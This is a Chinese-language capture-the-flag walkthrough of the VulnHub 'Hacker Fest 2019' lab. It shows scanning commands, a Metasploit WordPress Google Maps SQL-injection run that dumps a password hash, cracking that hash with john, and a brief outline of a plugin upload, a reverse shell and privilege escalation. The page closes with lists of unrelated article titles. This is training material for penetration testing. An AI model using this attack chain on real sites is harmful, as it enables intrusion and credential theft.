靶机地址：

https://www.vulnhub.com/entry/hacker-fest-2019,378/

主机扫描：

FTP尝试匿名登录

应该是WordPress的站点

进行目录扫描：

python3 dirsearch.py http://10.10.203.17/ -e html,json,php

此外还有一个phpmyadmin

http://10.10.203.17/phpmyadmin/index.php

使用wpscan扫描检测插件漏洞

wpscan --url http://10.10.203.17

msf5 > use auxiliary/admin/http/wp_google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17

[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >

密码hash破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

kittykat1

http://10.10.203.17/wp-admin/

安装ubh插件，进行上传文件

本地监听，访问反弹shell

这里有两个思路：

1是通过webshell切换到webmaster用户

2是直接通过远程ssh登录系统

进行提权

OVER!

最新文章

1. 了解Android的编译器
2. WPF进度条系列①滑动小圆点
3. Android动态加载学习笔记（一）
4. android DDMS 连接真机（己ROOT)，用file explore看不到data/data文件夹的解决办法
5. 随堂作业——到底有几个“1”（C++）
6. （多对象）Json转换成List
7. log翻硬币
8. Android毛玻璃处理代码(Blur)
9. javascript如何解析json对javascript如何解析json对象并动态赋值到select列表象并动态赋值到select列表
10. hdu_3549_Flow Problem(最大流)
11. Python第一天---第一个Python程序
12. C语言博客-指针
13. Android Studio项目用Git上传至码云（OSChina）
14. silverlight 从数据库获取到数据，动态生成XMLWEN文件，并获取文件进行操作
15. 分组统计SQL
16. Python内置的urllib模块不支持https协议的解决办法
17. oracle sql语句实现累加、累减、累乘、累除
18. 论文笔记：Learning how to Active Learn: A Deep Reinforcement Learning Approach
19. sql查询 !='' 和 is not null的区别
20. C# 证书打印《六》

热门文章

1. .net反编译原理
2. Incorrect string value: '\xF0\x9F\x92\x8BTi...'错误
3. 【开发工具 - Android Studio】之AndroidStudio使用笔记
4. 使用Git上传文件到github
5. bs4-爬取小说
6. mysql查询出所有重复的记录
7. PHP随机生成中国人姓名的类
8. Python中的Tcp协议应用之TCP服务端-线程版
9. STM32F4 阿波罗寄存器 进阶版LED灯
10. python数据挖掘第二篇-爬虫